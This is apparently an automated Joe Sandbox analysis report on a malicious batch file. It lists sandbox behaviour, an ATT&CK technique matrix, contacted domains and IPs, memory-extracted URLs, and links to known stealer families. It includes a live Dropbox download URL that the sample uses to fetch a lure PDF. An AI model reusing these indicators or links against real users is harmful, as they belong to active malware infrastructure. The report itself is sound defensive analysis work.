Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: Amcache.hve.2.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	1 Command and Scripting Interpreter	1 Scripting	111 Process Injection	11 Masquerading	OS Credential Dumping	21 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	31 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	1 DLL Side-Loading	111 Process Injection	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Obfuscated Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	21 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
FLKCAS1DzH.bat	17%	Virustotal		Browse
FLKCAS1DzH.bat	11%	ReversingLabs	Text.Malware.Boxter

Source	Detection	Scanner	Label	Link
https://.VisualC	0%	Avira URL Cloud	safe
http://dropbox.c	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
fg.microsoft.map.fastly.net	199.232.214.172	true	false	high
chrome.cloudflare-dns.com	172.64.41.3	true	false	high
www-env.dropbox-dns.com	162.125.65.18	true	false	high
s-part-0035.t-0009.t-msedge.net	13.107.246.63	true	false	high
googlehosted.l.googleusercontent.com	142.250.181.65	true	false	high
clients2.googleusercontent.com	unknown	unknown	false	high
bzib.nelreports.net	unknown	unknown	false	high
www.dropbox.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://bzib.nelreports.net/api/report?cat=bingbusiness	false		high
https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	Web Data.6.dr	false		high
https://duckduckgo.com/ac/?q=	Web Data.6.dr	false		high
https://cfl.dropboxstatic.com/static/metaserver/static/css/dig-components/tokens-vfltkUjWJ.css	873972660.exe.2.dr, 996293227.pdf.2.dr	false		high
https://permanently-removed.invalid/oauth2/v2/tokeninfo	msedge.exe, 00000003.00000003.1764216491.000013240246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000003.00000003.1763368983.0000132402468000.00000004.00000800.00020000.00000000.sdmp	false		high
https://paper.dropbox.com/cloud-docs/edit	powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cfl.dropboxstatic.com/static/metaserver/static/css/snackbar-vfl0sHK6v.css	873972660.exe.2.dr, 996293227.pdf.2.dr	false		high
https://www.dropbox.com/	powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1858829268.000002394E00E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropboxstatic.com/	873972660.exe.2.dr, 996293227.pdf.2.dr	false		high
https://docs.google.com/	manifest.json0.6.dr	false		high
https://www.youtube.com	6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	false		high
https://g.live.com/odclientsettings/Prod.C:	edb.log.4.dr	false		high
https://www.instagram.com	6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.1907593267.000002395D893000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cfl.dropboxstatic.com/static/metaserver/static/css/dig-illustrations/index.web-vflFaDZOD.css	873972660.exe.2.dr, 996293227.pdf.2.dr	false		high
https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge	6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	false		high
http://dropbox.com/	powershell.exe, 00000002.00000002.1858829268.000002394E00E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://outlook.office.com/mail/compose?isExtension=true	6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	false		high
https://officeapps-df.live.com	powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.login.yahoo.com/	powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.1858829268.000002394D821000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6	svchost.exe, 00000004.00000003.1761645349.000001FA570C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr	false		high
https://i.y.qq.com/n2/m/index.html	6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	false		high
https://www.deezer.com/	6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	false		high
https://login.yahoo.com/	powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com/playlist/	powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://onedrive.live.com/picker	powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://web.telegram.org/	6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	false		high
https://cfl.dropboxstatic.com/static/metaserver/static/css/abuse/fingerprintjs_component-vflTizAkf.c	873972660.exe.2.dr, 996293227.pdf.2.dr	false		high
https://permanently-removed.invalid/oauth2/v4/token	msedge.exe, 00000003.00000003.1764216491.000013240246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000003.00000003.1763368983.0000132402468000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com	powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1858829268.000002394DA48000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000002.00000002.1858829268.000002394DA48000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000002.00000002.1858829268.000002394DA48000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore	msedge.exe, 00000003.00000002.1853902272.000013240237C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdnjs.cloudflare.com/ajax/libs/mathjax/	offscreendocument_main.js.6.dr, service_worker_bin_prod.js.6.dr	false		high
https://drive-daily-2.corp.google.com/	manifest.json0.6.dr	false		high
https://contoso.com/Icon	powershell.exe, 00000002.00000002.1907593267.000002395D893000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Web Data.6.dr	false		high
http://crl.ver)	svchost.exe, 00000004.00000002.2922629932.000001FA56E00000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive-daily-1.corp.google.com/	manifest.json0.6.dr	false		high
http://dropbox.c	powershell.exe, 00000002.00000002.1858829268.000002394E00E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://excel.new?from=EdgeM365Shoreline	6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	false		high
https://github.com/Pester/Pester	powershell.exe, 00000002.00000002.1858829268.000002394DA48000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive-daily-5.corp.google.com/	manifest.json0.6.dr	false		high
https://docs.sandbox.google.com/document/fsip/	powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cfl.dropboxstatic.com/static/js/comments2/index-vflQdvUHu.css	873972660.exe.2.dr, 996293227.pdf.2.dr	false		high
https://permanently-removed.invalid/chrome/blank.html	msedge.exe, 00000003.00000003.1764216491.000013240246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000003.00000003.1763368983.0000132402468000.00000004.00000800.00020000.00000000.sdmp	false		high
https://permanently-removed.invalid/v1/issuetoken	msedge.exe, 00000003.00000003.1764216491.000013240246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000003.00000003.1763368983.0000132402468000.00000004.00000800.00020000.00000000.sdmp	false		high
https://permanently-removed.invalid/reauth/v1beta/users/	msedge.exe, 00000003.00000003.1764216491.000013240246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000003.00000003.1763368983.0000132402468000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1858829268.000002394E372000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/recaptcha/	powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cfl.dropboxstatic.com/static/metaserver/static/css/error-vflFJkh4x.css	873972660.exe.2.dr, 996293227.pdf.2.dr	false		high
https://chromewebstore.google.com/	msedge.exe, 00000003.00000002.1853902272.000013240237C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.6.dr	false		high
https://drive-preprod.corp.google.com/	manifest.json0.6.dr	false		high
https://.VisualC	powershell.exe, 00000002.00000002.1919183779.0000023965D4B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://chrome.google.com/webstore/	manifest.json.6.dr	false		high
https://dl-web.dropbox.com/	powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://app.hellofax.com/	powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cfl.dropboxstatic.com/static/	powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bard.google.com/	6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	false		high
https://permanently-removed.invalid/RotateBoundCookies	msedge.exe, 00000003.00000003.1764216491.000013240246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000003.00000003.1763368983.0000132402468000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.hellofax.com/	powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com	6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	false		high
https://outlook.live.com/mail/0/	6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	false		high
https://instructorledlearning.dropboxbusiness.com/	powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://tidal.com/	6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	false		high
https://cfl.dropboxstatic.com/static/js/file_viewer/index.web-vflDar80-.css	873972660.exe.2.dr, 996293227.pdf.2.dr	false		high
https://www.dropbox.com/pithos/	powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sales.dropboxbusiness.com/	powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://msn.com/	msedge.exe, 00000003.00000002.1854271352.00001324024D0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://a.sprig.com/	powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gaana.com/	6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	false		high
https://dropbox.com/	powershell.exe, 00000002.00000002.1858829268.000002394E00E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com/encrypted_folder_download/service_worker.js	powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://outlook.live.com/mail/compose?isExtension=true	6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	false		high
https://www.dropbox.com/static/api/	powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true	6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	false		high
https://latest.web.skype.com/?browsername=edge_canary_shoreline	6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	false		high
https://docsend.com/	powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://word.new?from=EdgeM365Shoreline	6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Web Data.6.dr	false		high
https://mail.google.com/mail/mu/mp/266/#tl/Inbox	6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	false		high
https://drive-autopush.corp.google.com/	manifest.json0.6.dr	false		high
https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppu	powershell.exe, 00000002.00000002.1858829268.000002394D821000.00000004.00000800.00020000.00000000.sdmp, FLKCAS1DzH.bat	false		high
https://aka.ms/winsvr-2022-pshelpX	powershell.exe, 00000002.00000002.1858829268.000002394F756000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1858829268.000002394EC17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1858829268.000002394F730000.00000004.00000800.00020000.00000000.sdmp	false		high
https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge	6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	false		high
https://open.spotify.com	6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	false		high
https://permanently-removed.invalid/MergeSession	msedge.exe, 00000003.00000003.1764216491.000013240246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000003.00000003.1763368983.0000132402468000.00000004.00000800.00020000.00000000.sdmp	false		high
https://twitter.com/	6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	false		high
https://m.vk.com/	6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	false		high
https://docs.google.com/document/fsip/	powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive-daily-6.corp.google.com/	manifest.json0.6.dr	false		high
https://drive-daily-0.corp.google.com/	manifest.json0.6.dr	false		high
https://permanently-removed.invalid/Logout	msedge.exe, 00000003.00000003.1764216491.000013240246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000003.00000003.1763368983.0000132402468000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.iheart.com/podcast/	6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	false		high
https://music.yandex.com	6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	false		high
https://clients2.googleusercontent.com	a690689c-85fb-442e-bb9a-eee103f6b6a2.tmp.7.dr	false		high
https://cfl.dropboxstatic.com/static/metaserver/static/css/app_actions/index-vflwwzTNE.css	873972660.exe.2.dr, 996293227.pdf.2.dr	false		high
https://www.paypal.com/sdk/js	powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
162.125.65.18	www-env.dropbox-dns.com	United States	19679	DROPBOXUS	false
23.219.161.132	unknown	United States	20940	AKAMAI-ASN1EU	false
162.159.61.3	unknown	United States	13335	CLOUDFLARENETUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
23.44.201.12	unknown	United States	20940	AKAMAI-ASN1EU	false
142.250.181.65	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
172.64.41.3	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.4
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581600
Start date and time:	2024-12-28 09:44:37 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	FLKCAS1DzH.bat renamed because original name is a hash value
Original Sample Name:	17ece0b40e0d30e590955d79b4de9541.bat
Detection:	MAL
Classification:	mal76.evad.winBAT@63/319@11/9
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 2 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .bat

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 13.107.42.16, 13.107.21.239, 204.79.197.239, 142.250.181.142, 13.107.6.158, 2.16.158.57, 2.16.158.43, 2.16.158.82, 2.16.158.80, 2.16.158.89, 2.16.158.83, 2.16.158.74, 2.16.158.48, 2.16.158.75, 2.19.198.56, 23.32.238.138, 217.20.58.98, 23.218.208.109, 192.229.221.95, 2.16.158.50, 2.16.158.41, 142.251.40.195, 142.251.41.3, 172.202.163.200, 23.55.235.241, 13.107.246.63, 142.250.72.106, 13.107.246.40
Excluded domains from analysis (whitelisted): config.edge.skype.com.trafficmanager.net, slscr.update.microsoft.com, a416.dscd.akamai.net, edgeassetservice.afd.azureedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, www.bing.com.edgekey.net, config-edge-skype.l-0007.l-msedge.net, e16604.g.akamaiedge.net, msedge.b.tlu.dl.delivery.mp.microsoft.com, www.gstatic.com, l-0007.l-msedge.net, prod.fs.microsoft.com.akadns.net, config.edge.skype.com, star.b.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, www.bing.com, cdp-f-tlu-net.trafficmanager.net, edge-microsoft-com.dual-a-0036.a-msedge.net, fs.microsoft.com, bzib.nelreports.net.akamaized.net, otelrules.azureedge.net, ctldl.windowsupdate.com, b-0005.b-msedge.net, www.googleapis.com, www-www.bing.com.trafficmanager.net, edge.microsoft.com, business-bing-com.b-0005.b-msedge.net, fe3cr.delivery.mp.microsoft.com, l-0007.config.skype.com
Execution Graph export aborted for target powershell.exe, PID 7316 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
03:45:28	API Interceptor	70x Sleep call for process: powershell.exe modified
03:45:37	API Interceptor	2x Sleep call for process: svchost.exe modified
08:45:50	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868 "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
08:45:58	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868 "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
162.159.61.3	T4qO1i2Jav.exe	Get hash	malicious	LummaC Stealer	Browse
	aD7D9fkpII.exe	Get hash	malicious	Vidar	Browse
	installer.bat	Get hash	malicious	Vidar	Browse
	skript.bat	Get hash	malicious	Vidar	Browse
	lem.exe	Get hash	malicious	Vidar	Browse
	HVlonDQpuI.exe	Get hash	malicious	Vidar	Browse
	PodcastsTries.exe	Get hash	malicious	Vidar	Browse
	ChoForgot.exe	Get hash	malicious	Vidar	Browse
	gVKsiQIHqe.exe	Get hash	malicious	Vidar	Browse
	trZG6pItZj.exe	Get hash	malicious	Vidar	Browse
162.125.65.18	https://www.dropbox.com/scl/fi/lncgsm76k7l5ix7fuu5t6/2024-OK-House-Outreach.pdf?rlkey=o4qr50zpdw1z14o6ikdg6zjt8&st=lrloyzlo&dl=0	Get hash	malicious	Unknown	Browse
	hnskdfgjgar22.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse
	Setup.exe	Get hash	malicious	Unknown	Browse
	https://f.io/nWWUxvn6	Get hash	malicious	HTMLPhisher	Browse
	RFQ Letter and Instructions.pdf	Get hash	malicious	Unknown	Browse
	hnsjdghf18.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse
	mjjt5kTb4o.lnk	Get hash	malicious	Unknown	Browse
	pkqLAMAv96.lnk	Get hash	malicious	RHADAMANTHYS	Browse
	IIC0XbKFjS.lnk	Get hash	malicious	RHADAMANTHYS	Browse
	873406390.bat	Get hash	malicious	RHADAMANTHYS	Browse
23.219.161.132	aD7D9fkpII.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fg.microsoft.map.fastly.net	nTyPEbq9wQ.lnk	Get hash	malicious	Unknown	Browse	199.232.214.172
	ktyihkdfesf.exe	Get hash	malicious	Vidar	Browse	199.232.210.172
	QhR8Zp6fZs.lnk	Get hash	malicious	RHADAMANTHYS	Browse	199.232.210.172
	CNUXJvLcgw.lnk	Get hash	malicious	RHADAMANTHYS	Browse	199.232.210.172
